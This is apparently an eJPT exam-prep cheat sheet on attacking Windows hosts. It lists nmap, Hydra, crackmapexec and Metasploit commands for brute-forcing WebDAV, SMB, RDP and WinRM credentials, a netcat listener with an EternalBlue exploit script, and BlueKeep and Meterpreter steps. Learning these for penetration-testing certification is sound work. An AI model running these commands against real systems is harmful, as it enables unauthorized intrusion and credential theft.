System-Host Based Attacks | eJPT

Exploiting Microsoft IIS WebDAV

Quick Scan to Check Open Ports and Services:

nmap -sV -sC 10.10.10.10
//Quick scan to identify open ports and services on the target.

Brute Forcing WebDAV:

nmap -sV -p 80 --script=http-enum 10.10.10.10

Identifying the /webdav/ directory and attempting brute force with Hydra.

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_password.txt 10.10.10.10 http-get /webdav/
//Hydra used to perform a dictionary attack on the /webdav/ directory.

Exploiting SMB with PsExec

SMB Login Brute Force:

msfconsole
[MODULE]> auxiliary/scanner/smb/smb_login
//Brute forcing SMB login credentials with Metasploit.

Automated SMB Login with Metasploit:

msfconsole
[MODULE]> exploit/windows/smb/psexec

Exploiting Windows MS17-010 SMB (EternalBlue)

Checking for MS17-010 Vulnerability:

nmap -sV -p 445 -O 10.10.10.10
nmap -sV -p 445 10.10.10.10 --script=smb-vuln-ms17-010
//Quick scan and Nmap script to identify the MS17-010 vulnerability.

Manual Exploitation with EternalBlue:

nc -nlvp 4444
python eternalblue_exploit8.py 10.10.10.10 eternalblue_exploit8.py

Manual exploitation using the EternalBlue exploit script.

Automated Exploitation with Metasploit:

msfconsole
[MODULE]> exploit/windows/smb/ms17_010_eternalblue
//Automating the exploitation of MS17-010 vulnerability with Metasploit.

Exploiting RDP

Checking for RDP:

nmap -sV -O 10.10.10.10
//Quick scan to identify if RDP is enabled on the target machine.

Brute Forcing RDP Credentials:

hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
//Brute forcing RDP credentials with Hydra.

Connecting to RDP

xfreerdp /u:Administrator /p:helloworld /v:10.10.10.10
//Connecting to RDP with xfreerdp after obtaining credentials.

Exploiting Windows CVE-2019-0708 RDP(BlueKeep)

Checking for BlueKeep Vulnerability:

nmap -p 3389 10.10.10.10
//Quick scan to identify the BlueKeep vulnerability.

Exploiting BlueKeep with Metasploit

msfconsole
[MODULE]> auxiliary/scanner/rdp/cve_2019_0708_bluekeep
//Identifying and exploiting the BlueKeep vulnerability using Metasploit.

Exploiting WinRM

To initiate a quick scan for WinRM, use the following command:

nmap -sV -p 5985 10.10.10.10

Brute Forcing WinRM Credentials:

To perform a brute force attack on WinRM credentials using crackmapexecuse:

crackmapexec winrm 10.10.10.10 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Executing commands with -xoption:

crackmapexec winrm 10.10.10.10 -u administrator -p tinkerbell -x "whoami"

Starting a Session with evil-winrm.rb:

evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.24.138

Creating a Meterpreter Session with Metasploit:

msfconsole
[MODULE]> exploit/windows/winrm/winrm_script_exec

After establishing a session, you can gather system information using:

meterprete> sysinfo

Conclusion

In this comprehensive exploration of system and host-based attacks, Amr Elsagaeishares invaluable insights and notes on exploiting diverse Windows vulnerabilities. Covering everything from web services to SMB and RDP, these techniques shed light on the myriad avenues attackers may explore. It's crucial to approach ethical hacking with a sense of responsibility and adhere to high ethical standards to ensure the integrity of security testing.

Best of luck on your eJPT adventure!